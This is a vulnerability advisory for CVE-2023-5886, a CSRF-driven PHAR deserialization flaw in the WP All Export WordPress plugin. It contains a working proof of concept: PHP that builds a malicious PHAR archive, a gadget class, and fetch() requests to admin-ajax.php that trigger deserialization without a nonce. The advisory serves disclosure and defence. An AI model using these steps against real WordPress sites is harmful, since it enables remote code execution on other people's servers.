WP All Export (Free < 1.4.1, Pro < 1.8.6) – Author+ PHAR Deserialization via CSRF | CVE 2023-5886

Description

The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution.

Proof of Concept

1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a `poc.phar` file using the following code, and add it to the root directory of the server:

<?php

class Evil {}

try
{
    $pharFile = 'poc.phar';

    if (file_exists($pharFile))
    {
        unlink($pharFile);
    }

    $phar = new Phar($pharFile);

    $phar->startBuffering();
        $phar->addFromString( 'test.txt', 'text' );
        $phar->setStub( '<?php __HALT_COMPILER(); ?>' );
        $phar->setMetadata( new Evil() );
    $phar->stopBuffering();

    echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
    echo $e->getMessage();
}


3. Add the following code to the server to simulate a gadget:

class Evil {
	function __wakeup() {
		die('Arbitrary deserialization');
	}
}


4. Run the following code in your browser to create a new export as a Super Admin user and note its ID. Notice that no nonce is required. Replace the `/var/www/html` directory if needed.

await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "method": "POST",
    "body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants",
    "mode": "cors",
});

5. Run the following code in your browser, as a Super Admin (again no nonce needed), using the ID of the export created in the previous step, and see that the PHAR deserialization occurs by examining its output.

await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=download&page=pmxe-admin-export&google_feed=1&id=ID", {
    "credentials": "include",
    "headers": {},
    "method": "GET",
    "mode": "cors",
});